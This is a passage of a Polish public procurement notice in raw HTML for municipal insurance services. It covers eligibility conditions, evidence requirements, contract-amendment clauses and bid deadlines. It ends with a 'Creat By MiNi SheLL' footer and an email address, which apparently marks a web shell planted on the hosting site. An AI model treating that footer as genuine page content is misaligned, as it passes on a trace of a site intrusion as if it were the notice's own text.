pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> DLA ZADANIA NR 1 i ZADANIA NR 2:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający wymaga zarejestrowania podmiotu prowadzącego działalność gospodarczą.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>posiadania uprawnień do wykonywania działalności ubezpieczeniowej na terenie RP, na warunkach określonych w Ustawie<br/>z dnia 11 września 2015r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz.U. 2019 poz. 381 z późn. zm.).<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">dla zadania nr 1 i zadania nr 2:<br/>1) odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o<br/>których mowa w pkt 1), składa dokument lub dokumenty wystawione w kraju,<br/>w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie<br/>ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza<br/>nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury.<br/>3) Dokumenty, o których mowa w pkt 1), powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>4) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1),<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Zapis ust. 3 stosuje się</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">dla zadania nr 1 i zadania nr 2<br/>posiadanie uprawnień do wykonywania działalności ubezpieczeniowej na terenie RP, na warunkach określonych w Ustawie z dnia<br/>11 września 2015r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz.U. 2019 poz. 381 z późn. zm.).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w Rozdziale XVIII pkt 14 ppkt 3 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty określone Rozdziale XIII pkt 2 ppkt 1 SWZ, potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane (art. 117 ust 3 Pzp).<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 3 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> DLA ZADANIA NR 1:<br/>1. Zamawiający w ramach art. 455 ust. 1 pkt. 1 ustawy Pzp przewiduje<br/>możliwość zmiany umowy na zasadach określonych w ust. 2 i 3 niniejszego paragrafu.<br/>2. Zamawiający przewiduje następujące warunki wprowadzenia zmian umowy, o których mowa w ust. 1 powyżej:<br/>2.1. w razie dokonywania przez Zamawiającego inwestycji w majątek trwały ( zakup mienia), wzrostu jego wartości lub<br/>zbywania takiego majątku, a także rozliczania obowiązujących klauzul ;<br/>2.2. w razie konieczności zwiększenia aktualnych sum gwarancyjnych lub uzupełnienia limitów;<br/>2.3. w przypadku zmian organizacyjnych (w tym przekształceń i likwidacji oraz powstania nowych jednostek) mogących<br/>wystąpić u Zamawiającego w tym jego jednostek organizacyjnych , w tym zmianie zakresu wykonywanej działalności w<br/>szczególności miejsca jej wykonywania;<br/>2.4. w przypadku korzystnych dla Zamawiającego zmian Ogólnych Warunków Ubezpieczenia;<br/>2.5. w przypadku zmian przepisów prawnych wpływających na zakres ubezpieczenia;<br/>2.6. w przypadku zmiany zakresu ubezpieczenia przewidzianych w klauzulach zawartych w SWZ, bądź w opisie przedmiotu<br/>zamówienia określonych w SWZ;<br/>2.7. w sytuacji której Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca, o ile nowy<br/>Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to<br/>za sobą innych istotnych zmian umowy, niż przewidziane przez Zamawiającego w SWZ.<br/>3. Zamawiający przewiduje następujący rodzaj i zakres zmian , o których mowa w ust. 1 powyżej, polegający na:<br/>3.1. zmianie wielkości sum ubezpieczenia w związku z: nabywaniem/ zbywaniem/ likwidacją środków trwałych ,<br/>modernizacją/ ulepszeniem środków trwałych, oddaniem do użytku nowych inwestycji, umowami cywilno-prawnymi<br/>nakładającymi na Zamawiającego obowiązek ubezpieczenia wraz z weryfikacją składek za ubezpieczenie będące ich<br/>konsekwencją;<br/>3.2. zmianie wysokości sum ubezpieczenia/sum gwarancyjnych wraz z weryfikacją stawek<br/>i składek ubezpieczenia będące ich konsekwencją;<br/>3.3. zmianie zakresu ubezpieczenia w związku z: zmianą zakresu wykonywanej działalności, ujawnieniem się i/lub<br/>powstaniem nowego ryzyka ubezpieczeniowego nie przewidzianego w SWZ lub wynikającego z konieczności dostosowania<br/>do wymogów instytucji finansujących;<br/>3.4. zmianie wysokości składki ubezpieczeniowej na skutek rozszerzenia lub ograniczenia zakresu ubezpieczenia na<br/>wniosek Zamawiającego i za zgodą Wykonawcy w przypadku ujawnienia się i/lub powstania ryzyka ubezpieczeniowego<br/>nieprzewidzianego w OPZ lub wynikającego z konieczności dostosowania do wymogów instytucji finansujących;<br/>3.5. zmianach przewidzianych w klauzulach zawartych w SWZ, bądź w opisie przedmiotu<br/>zamówienia określonego w SWZ;<br/>3.6. zachodzi konieczność dokonania zmiany terminu realizacji zamówienia w przypadku przedłużenia terminu zakończenia<br/>postępowania o udzielenia zamówienia , którego przedmiotem są usługi objęte umową .<br/>3.7. zmianie terminów płatności składki;<br/>3.8. włączenie nowej jednostki organizacyjnej Zamawiającego,<br/>3.9. zmianie zakresu i/lub przedmiotu działalności Zamawiającego, Ubezpieczonych;<br/>( przejecie mienia lub dróg)<br/>3.10. aktualizacji danych Wykonawcy, w szczególności zmiany: nazwy, adresu siedziby;<br/>3.11. zmianie wysokości składki ubezpieczeniowej w skutek okoliczności przewidzianych niniejszą umową;<br/>3.12. w przypadku konieczności interpretacji/wykładni znaczenia i/lub zakresu pojęć zastosowanych w umowie, gdy budzą<br/>uzasadnione wątpliwości;<br/>3.13. zmianie postanowień umowy w celu dostosowania do zmian w prawie powszechnie<br/>obowiązującym, które mają wpływ na realizację umowy;<br/>3.14. zmianie umowy dotyczącej poprawienia błędów i oczywistych omyłek słownych, literowych i liczbowych, zmiany<br/>układu graficznego umowy lub numeracji jednostek redakcyjnych, niepowodujące zmiany celu i istotnych postanowień<br/>umowy; dalsze zmiany w informacjach dodatkowych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gminaswidnica.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> zmiany dla zadania nr 1:<br/>4. Niedopuszczalne są zmiany umowy, które modyfikowałyby ogólny charakter umowy.<br/>5. Pozostałe zmiany umowy są możliwe tylko w okolicznościach określonych w art. 455 ustawy Pzp.<br/>6. Wszelkie zmiany umowy wymagają zgody obu stron (Wykonawcy i Zamawiającego) wyrażonej w formie pisemnego<br/>Ogłoszenie nr 2023/BZP 00242718/01 z dnia 2023-06-01<br/>2023-06-01 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>aneksu pod rygorem nieważności.<br/>7. W przypadku sprzeczności pomiędzy treścią niniejszej Umowy ubezpieczenia generalnego, a treścią umów<br/>indywidualnych lub ogólnych warunków ubezpieczenia, decyduje treść Umowy ubezpieczenia generalnego.<br/>8. W przypadku sprzeczności Ogólnych Warunków Ubezpieczenia z treścią Specyfikacji Warunków Zamówienia, decyduje<br/>treść Specyfikacji Warunków Zamówienia oraz oferta Wykonawcy.<br/>zmiany do umowy dla zadania nr 2:<br/>1. Zamawiający w ramach art. 455 ust. 1 pkt. 1 ustawy Pzp przewiduje<br/>możliwość zmiany umowy na zasadach określonych w ust. 2 i 3 niniejszego paragrafu.<br/>2. Zamawiający przewiduje następujące warunki wprowadzenia zmian umowy, o których mowa w ust. 1 powyżej:<br/>2.1. w razie dokonywania przez Zamawiającego zmian w stanie środków trwałych (mienia)<br/>2.2. w razie konieczności zwiększenia aktualnych sum ubezpieczenia w wyniku zmian obowiązujących przepisów ;<br/>2.3. w przypadku zmian organizacyjnych (w tym przekształceń i likwidacji oraz powstania nowych jednostek) mogących<br/>wystąpić u Zamawiającego w tym jego jednostek organizacyjnych, w tym zmianie zakresu wykonywanej działalności w<br/>szczególności miejsca jej wykonywania;<br/>2.4. w przypadku korzystnych dla Zamawiającego zmian Ogólnych Warunków Ubezpieczenia;<br/>2.5. w przypadku zmian przepisów prawnych wpływających na zakres ubezpieczenia;<br/>2.6. w przypadku zmiany zakresu ubezpieczenia przewidzianych w klauzulach zawartych w SWZ, bądź w opisie przedmiotu<br/>zamówienia określonych w SWZ;<br/>2.7. w sytuacji której Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca, o ile nowy<br/>Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to<br/>za sobą innych istotnych zmian umowy, niż przewidziane przez Zamawiającego w SWZ.<br/>3. Zamawiający przewiduje następujący rodzaj i zakres zmian , o których mowa w ust. 1 powyżej, polegający na: 3.1<br/>zmianie wielkości sum ubezpieczenia w związku z umowami cywilno-prawnymi nakładającymi na Zamawiającego obowiązek<br/>ubezpieczenia wraz z weryfikacją składek za ubezpieczenie będące ich konsekwencją;<br/>3.2 zmianie wysokości sum ubezpieczenia/sum gwarancyjnych wraz z weryfikacją stawek i składek ubezpieczenia będące<br/>ich konsekwencją;<br/>3.3 zmianie zakresu ubezpieczenia w związku z: zmianą zakresu wykonywanej działalności, ujawnieniem się i/lub<br/>powstaniem nowego ryzyka ubezpieczeniowego nie przewidzianego w SWZ lub wynikającego z konieczności dostosowania<br/>do wymogów instytucji finansujących;<br/>3.4 zmianie wysokości składki ubezpieczeniowej na skutek rozszerzenia lub ograniczenia zakresu ubezpieczenia na<br/>wniosek Zamawiającego i za zgodą Wykonawcy w przypadku ujawnienia się i/lub powstania ryzyka ubezpieczeniowego<br/>nieprzewidzianego w OPZ lub wynikającego z konieczności dostosowania do wymogów instytucji finansujących;<br/>3.5 zmianach przewidzianych w klauzulach zawartych w SWZ, bądź w opisie przedmiotu zamówienia określonego w SWZ<br/>(pozostałe zmiany w umowie)<br/>Zamawiający dodaje nową obligatoryjną przesłankę wykluczenia z postępowania: Zamawiający wykluczy Wykonawcę,<br/>wobec którego zachodzą przesłanki wykluczenia określone w art. 7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (Dz.U z 2022 poz. 835).

Creat By MiNi SheLL
Email: jattceo@gmail.com